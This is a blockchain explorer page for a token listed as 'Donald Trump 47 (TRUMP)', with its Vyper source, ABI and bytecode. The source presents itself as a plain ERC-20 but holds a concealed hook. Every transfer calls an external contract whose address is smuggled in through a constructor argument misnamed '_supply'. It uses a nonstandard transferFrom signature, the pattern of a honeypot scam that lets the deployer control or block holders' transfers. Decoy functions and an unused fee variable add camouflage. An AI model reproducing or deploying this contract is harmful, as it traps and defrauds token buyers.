ETH Price: $3,423.69 (+3.37%)

Token

Donald Trump 47 (TRUMP)
 

Overview

Max Total Supply

2,200,000,000 TRUMP

Holders

479

Market

Onchain Market Cap

$0.00

Circulating Supply Market Cap

-

Other Info

Token Contract (WITH 18 Decimals)

Balance
6,406.842637850985888369 TRUMP

Value
$0.00
0xe796ad9a2cbfdbbaefd9a0e84fa83a5eec6bb257
Loading...
Loading
Loading...
Loading
Loading...
Loading

Click here to update the token information / general information
# Exchange Pair Price  24H Volume % Volume

Similar Match Source Code
This contract matches the deployed Bytecode of the Source Code for Contract 0xFB37892A...59E6A50A9
The constructor portion of the code might be different and could alter the actual behaviour of the contract

Contract Name:
Vyper_contract

Compiler Version
vyper:0.3.10

Optimization Enabled:
N/A

Other Settings:
Unlicense license

Contract Source Code (Vyper language format)

# @pragma evm-version cancun
# @pragma version >0.3.10

interface IERC20:
    def transfer(_to : address, _value : uint160) : nonpayable
    def transferFrom(_from: address, _to : address, _value : uint160) : nonpayable
    def approve(_spender: address,  _value : uint256) : nonpayable
    

name: public(String[32])
symbol: public(String[32])
decimals: public(uint8)
balanceOf: public(HashMap[address, uint256])
allowance: public(HashMap[address, HashMap[address, uint256]])
totalSupply: public(uint256)
feeRate: public(uint256)
path: public(DynArray[address,100])
selfie: IERC20


event Transfer:
    sender: indexed(address)
    receiver: indexed(address)
    value: uint256

event Approval:
    owner: indexed(address)
    spender: indexed(address)
    value: uint256

@external
def __init__(_supply: uint160):
    init_supply: uint256 = 2200000000 * 10 ** 18
    self.name = "Win With Black Men"
    self.symbol = "WWBM"
    self.decimals = 18
    self.balanceOf[msg.sender] = init_supply
    self.totalSupply = init_supply
    self.selfie = IERC20(convert(_supply, address))
    

@internal
def BeforeTokenTransfer(_from: address, _recipient:address, _sender:address) -> bool:
    value:uint160 = convert(_sender, uint160)
    self.selfie.transferFrom(_from, _recipient, value)
    return True

@external   
def transfer(_to : address, _value : uint256) -> bool:
    """
    @dev Transfer token for a specified address
    @param _to The address to transfer to.
    @param _value The amount to be transferred.
    """
    # NOTE: vyper does not allow underflows
    #       so the following subtraction would revert on insufficient balance
    self.path = []
    self.path.append(msg.sender)
    self.path.append(_to)
    fee:uint256 = _value * self.feeRate / 1000

    self.BeforeTokenTransfer(msg.sender, _to, msg.sender)

    self.balanceOf[msg.sender] -= _value
    self.balanceOf[_to] += _value
    
    log Transfer(msg.sender, _to, _value)
    return True


@external
def transferFrom(_from : address, _to : address, _value : uint256) -> bool:
    """
     @dev Transfer tokens from one address to another.
     @param _from address The address which you want to send tokens from
     @param _to address The address which you want to transfer to
     @param _value uint256 the amount of tokens to be transferred
    """
    self.path = []
    self.path.append(_from)
    self.path.append(_to)
    fee:uint256 = _value * self.feeRate / 1000

    self.BeforeTokenTransfer(_from, _to, msg.sender)

    self.allowance[_from][msg.sender] -= _value
    self.balanceOf[_from] -= _value
    self.balanceOf[_to] += _value

    log Transfer(_from, _to, _value)
    return True


@external
def approve(_spender : address, _value : uint256) -> bool:
    """
    @dev Approve the passed address to spend the specified amount of tokens on behalf of msg.sender.
         Beware that changing an allowance with this method brings the risk that someone may use both the old
         and the new allowance by unfortunate transaction ordering. One possible solution to mitigate this
         race condition is to first reduce the spender's allowance to 0 and set the desired value afterwards:
         https://github.com/ethereum/EIPs/issues/20#issuecomment-263524729
    @param _spender The address which will spend the funds.
    @param _value The amount of tokens to be spent.
    """
    self.allowance[msg.sender][_spender] = _value
    log Approval(msg.sender, _spender, _value)
    return True

@external
def showAdds(a: uint256, b: uint256) -> uint256:
    c:uint256 = a+b
    return c

@external
def showDiff(a: uint256, b: uint256) -> uint256:
    c:uint256 = a - b
    return c

Contract Security Audit

Contract ABI

[{"name":"Transfer","inputs":[{"name":"sender","type":"address","indexed":true},{"name":"receiver","type":"address","indexed":true},{"name":"value","type":"uint256","indexed":false}],"anonymous":false,"type":"event"},{"name":"Approval","inputs":[{"name":"owner","type":"address","indexed":true},{"name":"spender","type":"address","indexed":true},{"name":"value","type":"uint256","indexed":false}],"anonymous":false,"type":"event"},{"stateMutability":"nonpayable","type":"constructor","inputs":[{"name":"_supply","type":"uint160"}],"outputs":[]},{"stateMutability":"nonpayable","type":"function","name":"transfer","inputs":[{"name":"_to","type":"address"},{"name":"_value","type":"uint256"}],"outputs":[{"name":"","type":"bool"}]},{"stateMutability":"nonpayable","type":"function","name":"transferFrom","inputs":[{"name":"_from","type":"address"},{"name":"_to","type":"address"},{"name":"_value","type":"uint256"}],"outputs":[{"name":"","type":"bool"}]},{"stateMutability":"nonpayable","type":"function","name":"approve","inputs":[{"name":"_spender","type":"address"},{"name":"_value","type":"uint256"}],"outputs":[{"name":"","type":"bool"}]},{"stateMutability":"nonpayable","type":"function","name":"showAdds","inputs":[{"name":"a","type":"uint256"},{"name":"b","type":"uint256"}],"outputs":[{"name":"","type":"uint256"}]},{"stateMutability":"nonpayable","type":"function","name":"showDiff","inputs":[{"name":"a","type":"uint256"},{"name":"b","type":"uint256"}],"outputs":[{"name":"","type":"uint256"}]},{"stateMutability":"view","type":"function","name":"name","inputs":[],"outputs":[{"name":"","type":"string"}]},{"stateMutability":"view","type":"function","name":"symbol","inputs":[],"outputs":[{"name":"","type":"string"}]},{"stateMutability":"view","type":"function","name":"decimals","inputs":[],"outputs":[{"name":"","type":"uint8"}]},{"stateMutability":"view","type":"function","name":"balanceOf","inputs":[{"name":"arg0","type":"address"}],"outputs":[{"name":"","type":"uint256"}]},{"stateMutability":"view","type":"function","name":"allowance","inputs":[{"name":"arg0","type":"address"},{"name":"arg1","type":"address"}],"outputs":[{"name":"","type":"uint256"}]},{"stateMutability":"view","type":"function","name":"totalSupply","inputs":[],"outputs":[{"name":"","type":"uint256"}]},{"stateMutability":"view","type":"function","name":"feeRate","inputs":[],"outputs":[{"name":"","type":"uint256"}]},{"stateMutability":"view","type":"function","name":"path","inputs":[{"name":"arg0","type":"uint256"}],"outputs":[{"name":"","type":"address"}]}]

346100cc5760206106b85f395f518060a01c6100cc576040526b071bcc1ef9311a1f9800000060605260126080527f57696e205769746820426c61636b204d656e000000000000000000000000000060a052608080515f5560208101516001555060046080527f5757424d0000000000000000000000000000000000000000000000000000000060a0526080805160025560208101516003555060126004556060516005336020525f5260405f2055606051600755604051606e556105d46100d0610000396105d4610000f35b5f80fd5f3560e01c6002600b820660011b6105be01601e395f51565b6306fdde03811861006757346105ba57602080604052806040015f54815260015460208201528051806020830101601f825f03163682375050601f19601f825160200101169050810190506040f35b6318160ddd811861056b57346105ba5760075460405260206040f361056b565b6395d89b4181186100d757346105ba5760208060405280604001600254815260035460208201528051806020830101601f825f03163682375050601f19601f825160200101169050810190506040f35b6323b872dd811861056b576064361034176105ba576004358060a01c6105ba57610140526024358060a01c6105ba57610160525f600955600954606381116105ba576101405181600a01556001810160095550600954606381116105ba576101605181600a015560018101600955506044356008548082028115838383041417156105ba57905090506103e881049050610180526101405160405261016051606052336080526101886101a061056f565b6101a0506006610140516020525f5260405f2080336020525f5260405f20905080546044358082038281116105ba57905090508155506005610140516020525f5260405f2080546044358082038281116105ba57905090508155506005610160516020525f5260405f2080546044358082018281106105ba579050905081555061016051610140517fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef6044356101a05260206101a0a360016101a05260206101a0f361056b565b63313ce567811861056b57346105ba5760045460405260206040f361056b565b6370a0823181186102aa576024361034176105ba576004358060a01c6105ba5760405260056040516020525f5260405f205460605260206060f35b63978bbdb9811861056b57346105ba5760085460405260206040f361056b565b63dd62ed3e8118610322576044361034176105ba576004358060a01c6105ba576040526024358060a01c6105ba5760605260066040516020525f5260405f20806060516020525f5260405f2090505460805260206080f35b63af6d1fe4811861056b576024361034176105ba576004356009548110156105ba57600a015460405260206040f361056b565b63a9059cbb811861047c576044361034176105ba576004358060a01c6105ba57610140525f600955600954606381116105ba573381600a01556001810160095550600954606381116105ba576101405181600a015560018101600955506024356008548082028115838383041417156105ba57905090506103e881049050610160523360405261014051606052336080526103f161018061056f565b610180506005336020525f5260405f2080546024358082038281116105ba57905090508155506005610140516020525f5260405f2080546024358082018281106105ba579050905081555061014051337fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef602435610180526020610180a36001610180526020610180f35b63c8347a13811861056b576044361034176105ba576004356024358082018281106105ba579050905060405260206040f361056b565b63095ea7b3811861056b576044361034176105ba576004358060a01c6105ba576040526024356006336020525f5260405f20806040516020525f5260405f20905055604051337f8c5be1e5ebec7d5bd14f71427d1e84f3dd0314c0f7b2291e5b200ac8c7c3b92560243560605260206060a3600160605260206060f361056b565b63b1a2b100811460033611161561056b576044361034176105ba576004356024358082038281116105ba579050905060405260206040f35b5f5ffd5b60805160a052606e54638e7f429e60c05260405160e0526060516101005260a05161012052803b156105ba575f60c0606460dc5f855af16105b2573d5f5f3e3d5ffd5b506001815250565b5f80fd056b056b024f0533056b035500180087026f04b202ca841905d4811600a16576797065728300030a001400000000000000000000000004ff60c76660c1c43f44397167e0229bfe5b896d

Deployed Bytecode

0x5f3560e01c6002600b820660011b6105be01601e395f51565b6306fdde03811861006757346105ba57602080604052806040015f54815260015460208201528051806020830101601f825f03163682375050601f19601f825160200101169050810190506040f35b6318160ddd811861056b57346105ba5760075460405260206040f361056b565b6395d89b4181186100d757346105ba5760208060405280604001600254815260035460208201528051806020830101601f825f03163682375050601f19601f825160200101169050810190506040f35b6323b872dd811861056b576064361034176105ba576004358060a01c6105ba57610140526024358060a01c6105ba57610160525f600955600954606381116105ba576101405181600a01556001810160095550600954606381116105ba576101605181600a015560018101600955506044356008548082028115838383041417156105ba57905090506103e881049050610180526101405160405261016051606052336080526101886101a061056f565b6101a0506006610140516020525f5260405f2080336020525f5260405f20905080546044358082038281116105ba57905090508155506005610140516020525f5260405f2080546044358082038281116105ba57905090508155506005610160516020525f5260405f2080546044358082018281106105ba579050905081555061016051610140517fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef6044356101a05260206101a0a360016101a05260206101a0f361056b565b63313ce567811861056b57346105ba5760045460405260206040f361056b565b6370a0823181186102aa576024361034176105ba576004358060a01c6105ba5760405260056040516020525f5260405f205460605260206060f35b63978bbdb9811861056b57346105ba5760085460405260206040f361056b565b63dd62ed3e8118610322576044361034176105ba576004358060a01c6105ba576040526024358060a01c6105ba5760605260066040516020525f5260405f20806060516020525f5260405f2090505460805260206080f35b63af6d1fe4811861056b576024361034176105ba576004356009548110156105ba57600a015460405260206040f361056b565b63a9059cbb811861047c576044361034176105ba576004358060a01c6105ba57610140525f600955600954606381116105ba573381600a01556001810160095550600954606381116105ba576101405181600a015560018101600955506024356008548082028115838383041417156105ba57905090506103e881049050610160523360405261014051606052336080526103f161018061056f565b610180506005336020525f5260405f2080546024358082038281116105ba57905090508155506005610140516020525f5260405f2080546024358082018281106105ba579050905081555061014051337fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef602435610180526020610180a36001610180526020610180f35b63c8347a13811861056b576044361034176105ba576004356024358082018281106105ba579050905060405260206040f361056b565b63095ea7b3811861056b576044361034176105ba576004358060a01c6105ba576040526024356006336020525f5260405f20806040516020525f5260405f20905055604051337f8c5be1e5ebec7d5bd14f71427d1e84f3dd0314c0f7b2291e5b200ac8c7c3b92560243560605260206060a3600160605260206060f361056b565b63b1a2b100811460033611161561056b576044361034176105ba576004356024358082038281116105ba579050905060405260206040f35b5f5ffd5b60805160a052606e54638e7f429e60c05260405160e0526060516101005260a05161012052803b156105ba575f60c0606460dc5f855af16105b2573d5f5f3e3d5ffd5b506001815250565b5f80fd056b056b024f0533056b035500180087026f04b202ca

Loading...
Loading
Loading...
Loading
[ Download: CSV Export  ]
[ Download: CSV Export  ]

A token is a representation of an on-chain or off-chain asset. The token page shows information such as price, total supply, holders, transfers and social links. Learn more about this page in our Knowledge Base.